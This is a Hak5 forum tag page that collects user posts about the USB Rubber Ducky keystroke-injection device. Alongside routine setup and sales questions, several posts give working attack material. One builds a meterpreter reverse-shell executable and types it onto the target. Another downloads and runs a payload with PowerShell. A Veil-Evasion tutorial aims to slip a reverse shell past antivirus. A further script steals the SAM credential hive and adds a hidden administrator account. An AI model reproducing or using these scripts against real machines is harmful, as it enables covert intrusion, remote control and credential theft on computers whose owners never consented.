Jump to content

Search the Community

Showing results for tags 'ducky'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

  1. When I am trying to program my Rubber Ducky I get this message. "There was an error flashing, make sure your Ducky is in DFU mode. Can someone make a video of this? Also a video on setting up a Rubber Ducky. When I tried to plug in my USB to my computer I do not see anything, but a sign saying "Hello World" in .txt. By the way this is my first time in this forum. Thank You, To whomever can help me
  2. Hi, I´m looking for a second hand USB Rubber Ducky. I´m from Spain. If you have an unused spare ducky, let me know how much you want for it. Thanks, Tamasco
  3. Ok so let me preface this with an apology in case my google fu has failed me. I've had a ducky for about a week now and have to be able to flash new firmware to it. I know you have to push the button during insertion to enter dfu mode. I have tried on a mac, windows 10 VM, and a kali box and have to get it. Nothing even seems to see it... Is there a way to verify dfu mode? Im hoping its not a faulty pin. Any help is greatly appreciated!!
  4. Saw a talk online at DefCon where someone had created a proxy server setup inject a hook into the js files a bit like Beef in kali combined with SSL stripping and MITM to grab passwords etc and thought this may be able to be used with the ducky by plugging into a computer and it automatically setting up a connection to your proxy server! For example, in Windows 10 you could use Win-Key + I to open setting and start typing proxy and hit enter to open up the right page then using tab to scroll down, then use up key to turn proxy on and keep doing the and enter the correct setup for your server and then save it! This is just an idea not sure if it's been done or if it can be done quicker using command-line or PowerShell haven't really looked at it! May not be practical please comment any suggestions!! Thanks !
  5. So. I bought a USB Ducky with the hope that it would allow me to enable USB Debugging and set file transfer to MTP mode on my wife's broken Samsung Galaxy S6 with a broken screen, in order to get two years of family photos that she wasn't backing up off the now totally inaccessible phone. I have almost no coding experience (as in, I made a Geocities site in the 90s and learned some basic HTML, and that's it). So when I discovered that the code written by folks a few years back to do this hack to phones on Android 4 wouldn't work at all on Android 6, I gave up hope. For a minute. Then I decided I'd try it myself. I discovered, through trial and error, that this version of android doesn't accept rapid-fire input from a keyboard. A default delay of 300 was needed to prevent the phone from missing commands. If I had to guess, I'd say the Google people got wise and built this in to try to prevent this kind of attack. Still, the code below does work. It does three things: It enables developer mode, enables USB Debugging, and changes the USB behavior from Charging to MTP. If your USB behavior is already MTP, it'll change it to PTP, so edit that if you need to. Anyway, thought I'd share. It did work. Best of luck, especially to others are having similar problems and hoping for an aquatic foul based answer. DEFAULT_DELAY 300 REM Enable Developer options and usb debugging on Android REM Author: SamR REM Tested on Galaxy S6 REM Android Version 6.0.1 REM To start at the home screen ESCAPE ESCAPE ESCAPE ESCAPE ALT ESCAPE DELAY 500 REM To enter settings DOWN DOWN DOWN ENTER ENTER DELAY 500 STRING s STRING e STRING t STRING t STRING i STRING n STRING g STRING s DELAY 500 DOWN ENTER DELAY 500 REM To Access About Device RIGHT RIGHT RIGHT RIGHT RIGHT RIGHT RIGHT RIGHT DOWN DOWN DOWN DOWN DOWN DOWN ENTER REM To Enable Developer Options DOWN DOWN DOWN DOWN DOWN DOWN DOWN DOWN DOWN ENTER ENTER ENTER ENTER ENTER ENTER ENTER DELAY 500 REM To Enable USB Debugging ESCAPE UP ENTER DOWN DOWN DOWN DOWN DOWN DOWN ENTER DELAY 500 TAB ENTER REM Set To MTP DOWN DOWN DOWN DOWN DOWN DOWN DOWN DOWN DOWN DOWN DOWN DOWN DOWN DOWN DOWN ENTER DOWN ENTER REM Return To Home ESCAPE ESCAPE ESCAPE ESCAPE
  6. Hello , is there any way to run a ducky script without a usb
  7. So I have seen people having issues with doing a download of a meterpreter payload and getting it to run from the ducky. I went for a different approach. I decided to try to modify this script from the wiki (i think darren did a segment on it) in a different way. Here is what I came up with. Create the exe from msfvenom with the parms to connect the the metasploit handler Encode the exe with base64 Edit the encoding to be duckyfied Append the duckyfied encoded exe to met.txt Append last.txt to met.txt Duckyencoder to make the inject.bin Place on ducky sdcard ... win msfvenom -a x86 --platform windows \ -p windows/meterpreter/reverse_tcp \ LHOST=IP_ADDRESS \ LPORT=PORT \ PREPENDMIGRATE=true \ PREPENDMIGRATEPROC=notepad.exe \ ReverseConnectRetries=20 \ -b '\x00' \ -e x86/shikata_ga_nai \ -f exe |\ base64 > bad_exe.txt sed -e 's/^/STRING /' -e '/STRING/ a ENTER' bad_exe.txt >> met.txt cat last.txt >> met.txt java -jar encoder.jar -i met.txt -o inject.bin Contents of met.txt ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU DELAY 400 STRING a DELAY 600 LEFTARROW ENTER DELAY 400 STRING copy con c:\decoder.vbs ENTER STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0) STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = STRING CreateObject("Scripting.FileSystemObject"): ENTER STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function STRING decodeBase64(base64): ENTER STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"): STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub STRING writeBytes(file, bytes):Dim binaryStream: ENTER STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1: STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub ENTER CTRL z ENTER STRING copy con c:\bad_exe.txt ENTER Contents of last.txt CTRL z ENTER STRING cscript c:\decoder.vbs c:\bad_exe.txt c:\bad.exe ENTER STRING c:\bad.exe ENTER STRING exit ENTER
  8. Hello.... i have a question about the USB Rubber Ducky... Hope you can help me! My attack computer is a Raspberry Pi 2 with Raspbian installed. My victim PC is a Windows 10 Notebook. I want to get a meterpreter reverse tcp-session to my Raspberry Pi from the victim if i plug in my USB Rubber Ducky into the Windows PC. As i proceeded: 1. i created the “payload.exe” on the Raspberry Pi ~$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.178.35 LPORT=443 -f exe -o /home/pi/payload.exe 2. i created a listener file and run it on the Raspberry Pi ~$ sudo nano /home/pi/listener.rc To test how things work I have saved the “payload.exe” on the victim machine's hdd and run it as the systemadministrator . This is was happened on the Pi's screen: so far so good..... My idea now was to let the USB Rubber Ducky do two things for me after plug-in 1. download my “payload.exe” from the internet 2. install it on the victim-pc with admin rights so i created a “inject.bin” with the Duck Toolkit Encoder. This is the Code i used (changed the download URL to an existing) DELAY 500 CONTROL ESCAPE DELAY 200 STRING cmd.exe DELAY 100 ENTER DELAY 500 STRING cd %TEMP% DELAY 100 ENTER DELAY 100 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://.....payload.exe,%TEMP%\payload.exe'); Start-Process "%TEMP%\payload.exe" DELAY 100 ENTER DELAY 100 ALT SPACE DELAY 50 DOWN DELAY 50 DOWN DELAY 50 DOWN DELAY 50 DOWN DELAY 50 DOWN DELAY 50 ENTER DELAY 50 GUI d Now, the code runs through without any errors, if i plug in the Rubber Ducky. But the problem is that meterpreter gets no connection with the Ducky! Why my DuckyScript doesnt execute the downloaded file? I dont understand whats my fault! Whats wrong? Please help me! Greetings to Darren and the whole hak5-Team!
  9. Guest

    Pineapple Kali Pi rev:2

    I originally made this device with a raspberry pi model b, wifipineapple mark 4 and the usb rubberducky. Now I am using the raspberry pi 2, wifi pineapple mark 5 and the usb rubberducky
  10. Hi all, So, without giving anything away that would end up with you behind iron bars with a lover called Frank, what kind of experiences have you had with the Rubber Ducky? In which scenarios have you found it to be invaluable? I ask through curiosity and for inspriation. I'm sure there are a few good stories out there. Thanks
  11. Hi, This is probably a silly question, but I couldn't find the answer anywhere. What is the item, on this image, second from the left? (this is the kit that comes with the USB Rubber Ducky Deluxe)
  12. Looking for a used Pineapple and Rubber Ducky combo but willing to purchase separately if the deal is good enough. DM me or post here with what you have for sale and total price shipped to FL.
  13. Greetings everyone, I'm not from the Hak5 team but I wanted to share my work. I've made a small command line tool that can convert any plain/text file into a ducky script. I didn't know if this type of tool already exists so I created mine. Tool capabilities : Convert any file plain/text file (no matter it's size). Append commands after each lines More will come soon. Please note that this tool is "Open Source" you can download it from github, it's written in Pascal (see link below). For the moment this tool can only be executed on Windows. If you want to run it on a Linux system you can still use Wine until a new version is released. Tool in action : 1. Choose a plain/text file (no matter it's extension) This file will be converted into a ducky script ! 2. Run the tool with the following parameters (DSC -i myfile.dat -a DELAY 100,ENTER) 3. This file will be converted and the tool will create a new one (myfile.dat.dsc) with the following content STRING This file DELAY 100 ENTER STRING will be DELAY 100 ENTER STRING converted into DELAY 100 ENTER STRING a ducky script ! DELAY 100 ENTER This can be useful if you have a long script to write, like a VBScript or whatever. GitHub link : https://github.com/CDevCom/DuckyStringConverter Best regards, CDevCom.
  14. I have been trying to set up my Ducky to run an injection file. When I plug it in my PC a red light comes on and just stays there on the Ducky but does nothing. I thought that it may be the format of the SD Card so have reformatted it using Fat32 and installed new Inject.bin files I have downloaded from this forum so I know they should work. Any ideas on what could be wrong or how I could fix it? Thanks,
  15. I've pulled together a plugin for Rockbox (http://rockbox.org) that can quack like a duck: http://gerrit.rockbox.org/r/1212 It also extends the scripting language, adding variables and flow control. However, it has one major limitation: speed. It can only send about 100 keys/second, which is only 20% of the theoretical maximum achievable with USB. For those of you with supported MP3 players, I suggest that you try it and feel free to ask questions and give feedback!
  16. hak5Shop Re-Stocking: Pineapples, Rubber Ducky's, LAN Turtles? :-| I've had 3 items on my geek wish list to get around to buying from hak5, a new Pineapple in any kit, a couple Rubber Ducky dongles, and a couple turtles. Now my luck is ALL say out of stock on the Hak5 Store. Thank goodness the Yard Stick is in stock for now because that was another item along with a backup Alfa. I'm sure I could probably find a used one but I would really prefer buying it from the Hak5 store. Being stupid I thought these were Hak5 items planned on continuing to sell and when initially seeing them I saw no mention of these being limited edition items. I actually planned on buying the whole field kit since it seemed a easier way to get mostly everything I wanted. Any idea or word on when the Pineapple, Rubber Ducky, Turtle Devices will be back in stock in the hak5 shop? I am really hoping it's a when and not if :-( I was even considering on offering some penetration testing services locally and these items were like a must have. Thanks in advance to anyone that has heard anything at all, seriously thank you. :-| -Dox
  17. Hello everybody My usb rubber ducky arrives in a few days and i have another bunch of questions: 1. It comes with micro SD card, doesn´t it? How much is it capability? (2, 4, 8 GB?) 2. Does it came with pre-installed firmware? 3. Does java version matter when building payloads? 4. Does exists any noob-proof tutorial? you know Thanks in advance!
  18. Hi everyone, recently I got into using rubber ducky with android phones/tablets. The keyboard shortcut for accessing home (like pressing the home button) is Win key + ESC or Alt + ESC. If I plug normal usb keyboard to the android device, both shortcuts works perfectly. If I try to simulate same shortcut on rubber ducky, it does not work. Any idea what might be causing that? Ducky script IS executed (I put some STRING before the shortcut to test it and it was written down). DELAY 1000 STRING Testing DELAY 400 ALT ESC DELAY 400 GUI ESC I have a feeling the ALT + ESC or WIN + ESC is executed too quickly and android ignores it, but its a wild guess. I would appreciate any advice. Nikedp
  19. I created a payload on the duckytoolkit page, and put that on the sd card. Then run it through Ducky on the comp with second usb plugged in and nothing shows up on that usb. Please help.
  20. Below are instructions for using Veil-Evasion to produce a Windows Powershell payload for a Meterpeter reverse TCP connection and injecting it using a USB Rubber Ducky. This is my first tutorial post, so if my formatting is a bit off... too bad ;) This method has a few benefits over the method provided using the "Simple-Ducky" program. It is injected completely through text input typed in by the Ducky into the Windows Command Shell It does not require the target computer to download a compiled file from a web server to set up the connection. You do not have to host a web server for the payload. (Less open ports on your machine, always a good thing.) Virus scanners are (hopefully) not going to pick this up because it is being entered directly into the Command Shell by Ducky. The flip side is that this is a larger payload for Ducky to type out so you will have to plan accordingly. Initial Setup (If you are running Kali, BlackBox, Backtrack, etc. you are probably almost set up already.) Install and setup Metasploit if you have not already. Install and setup Veil-Evasion (Homepage is here). Veil-Evasion is now available in the Kali repository. Use: apt-get install veil-evasion -y Note on initial install: You need to run veil-evasion after it is loaded by apt-get to set everything up. It says you don't have to run it as root, but you need to run it as root! Setup can take a bit. Set up Ducky Encoder or whatever you choose to use to make your inject.bin. Payload Generation Start veil-evasion. Type "list" to see the list of available payloads. Enter the number for the "powershell/meterpreter/rev_tcp" payload. (Was 22 for me.) Set you LHOST and LPORT the same as you would do setting up a payload in Metasploit. Type "generate". Enter the name you want for the payload. Veil will generate the payload in a .bat file in the "Veil-Output" directory under "source". (Most likely in the /usr/share/ directory.) Veil will also generate a Metasploit resource file for setting up a listener that you can use if you want. However, if you are behind a NAT router you will need to plan accordingly. Find and open the .bat file in the text editor of your choice and copy off the first section of the file as follows: powershell.exe -Nop.....ReadToEnd();" (The first .ReadToEnd() and don't miss the quotation mark at the end, you will need that.) If your target is a 64 bit machine you will need to add "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\" prior to the powershell.exe in order for your payload to work. Set up your Ducky script as you like to account for driver install, etc. Have it open a standard command shell and copy and paste the text you cut out above into the Ducky script as a STRING: Create you inject.bin file and put it on your Ducky.Operation Start a windows/meterpreter/reverse_tcp listener in Metasploit on your machine. (32 bit, not the x64 payload) Plug the Ducky into your target machine and away you go. The Command Shell window will automatically close once the Powershell script begins to execute. You may need to migrate to another x86 process to get full Meterpreter functions. A few notes If you try to run this sever times in quick succession on a target machine the subsequent tries may not go through as Powershell likes to hang on for a bit. Killing the initial process after migrating might fix this. I've tested this on the following:Windows 7 Pro x64 (physical machine with a physical network, through a restrictive firewall... Reverse connections rock!) Windows 8.1 Pro x64 - Virtual Windows 10 Pro x64 Technical Preview - Virtual Windows Server 2008 R2 - Virtual Windows Server 2012 R2 - Virtual Enjoy.
  21. Is there any way to make a DuckSlurp without Powershell or the run command? I can't seem to get it to work on OSX
  22. I'm trying to get my usb ducky to save the sam file to the flash drive as well as create a new admin user. I'm not really sure where I am going wrong here but if anyone has advice or a code that works it would be greatly appreciated!!! DELAY 5000 GUI r DELAY 750 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 750 ENTER ALT SPACE DELAY 750 STRING m DELAY 750 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime ENTER STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory ENTER STRING $date = get-date ENTER STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>" ENTER STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' ENTER STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" ENTER STRING $createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\', 'ClientAccessible') ENTER STRING $shadow = gwmi Win32_ShadowCopy | ? { $_.ID -eq $createShadow.ShadowID } ENTER STRING $addSlash = $shadow.DeviceObject + '' ENTER STRING cmd /c mklink C:\shadowcopy $addSlash ENTER STRING Copy-Item 'C:\shadowcopy\Windows\System32\config\SAM' $fileSaveDir ENTER STRING Remove-Item -recurse -force 'C:\shadowcopy' ENTER STRING Net User Admin tacos /ADD ENTER STRING Net LocalGroup Administrators Admin /ADD ENTER DELAY 500 STRING reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList' /v Admin /t REG_DWORD /d 0 /f ENTER STRING $Report >> $fileSaveDir'/ComputerInfo.html' ENTER STRING function copy-ToZip($fileSaveDir){ ENTER STRING $srcdir = $fileSaveDir ENTER STRING $zipFile = 'C:\Windows\Report.zip' ENTER STRING if(-not (test-path($zipFile))) { ENTER STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) ENTER STRING (dir $zipFile).IsReadOnly = $false} ENTER STRING $shellApplication = new-object -com shell.application ENTER STRING $zipPackage = $shellApplication.NameSpace($zipFile) ENTER STRING $files = Get-ChildItem -Path $srcdir ENTER STRING foreach($file in $files) { ENTER STRING $zipPackage.CopyHere($file.FullName) ENTER STRING while($zipPackage.Items().Item($file.name) -eq $null){ ENTER STRING Start-sleep -seconds 1 }}} ENTER STRING copy-ToZip($fileSaveDir) ENTER STRING $usbPresent = 'False' ENTER STRING do { ENTER STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY’ } | Measure ENTER STRING if ($present.Count -ge 1){ ENTER STRING $usbPresent = 'True' }Else { ENTER STRING $usbPresent = 'False'}} ENTER STRING until ($usbPresent -eq 'True') ENTER STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY’ } | select Name ENTER STRING move-item c:\Windows\Report.zip $driveLetter.Name ENTER STRING remove-item $fileSaveDir -recurse ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 1500 STRING C:\Windows\config-d04a8.ps1 ENTER DELAY 750 ALT F4 DELAY 1500 GUI r DELAY 750 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 1500 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 1500 STRING m DELAY 1500 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 750 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER
  23. Hello... I saw that there is a 'Composite Duck 4x CAPS Trigger' for the Ducky. I have downloaded and compiled some of the Source Code but I didn't see any code for the x4 Caps trigger. I know midnitesnake is working with this, but I wondered if it was possible to get a copy of the source code for the x4 Caps Normally I would experiment with while loops and if statements, but I really don't want to damage the Ducky. It's not that I'm lazy, I just don't want to damage my little Ducky. Any help would be great. Thanks in advance.
  24. Hello Guys I need help with the a payload to get a reverse shell using the ruber ducky: I tried to use the powerducky script to get a reverse shell and no luck... I figured it out it was because my victim was an X64 and not a 386 ... So i went ahead and modified my powershell shell script to detect if my victim is X64... now when I run manually my malicious powershell script on my victim and i have a htpps listener in my attacking machine it works perfectly ... now the challenge i have is encoding my powershell script in base 64 so I can ultimately use in my inject.bin.... This is what I used to encode my powershell script: $Content = Get-Content -Path <path to my file> -Encoding Byte $Base64 = [system.Convert]::ToBase64String($Content) $Base64 | Out-File <path to encoded file> Also tried iconv in Linux: $Content = Get-Content -Path <path to my file> -Encoding Byte Encode="`cat $Content | iconv --to-code UTF-16LE | base64 -w 0`" and then dumping the value of variable encode... Whenever I tried to execute my payload in my victim (after loading the inject.bin in the ducky) the ducky starts to delivers the base 64 payload... however powershell truncates the payload while processing the base 64 string .. thus not getting a reverse shell.... After trying to run manually the powershell script... powershell -Enc <base64 string> i got the message in my victim that the string is not a valid base 64 string.... Anyone can point me on the command I need to run to convert my powershell script into a valid base 64 string so powershell can execute it? PS the reverse shell (reflective and web delivered) in powerducky have the same problem... whenever the inject.bin runs in the victim... the base 64 string is truncated in the victim and no reverse shell is sent to the attacking machine... Thanks
  25. Hello gentleman, Sorry in advance if this issue have been answered before, I was searching the forum for some information and did´nt found something that clarify my needs. I am doing my first tests with ducky in some Windows 7 / 8 machines. What I noticed was that in both English and Portuguese (pt-br) systems, when I can the command "powershell Start-Process cmd -Verb runAs" As you can see, when UAC prompt appears, Windows Powershell continues to have the focus, so I can´t submit the command "ALT S" (equivalent to ALT Y on English systems) to the UAC window and go on with my Command Quacking. In another thread I see a friend of the forum saying that solved using "GUI TAB" command, but over here this is not working. Some of you know how I can go ahead to solve this? Ty!
×
×
  • Create New...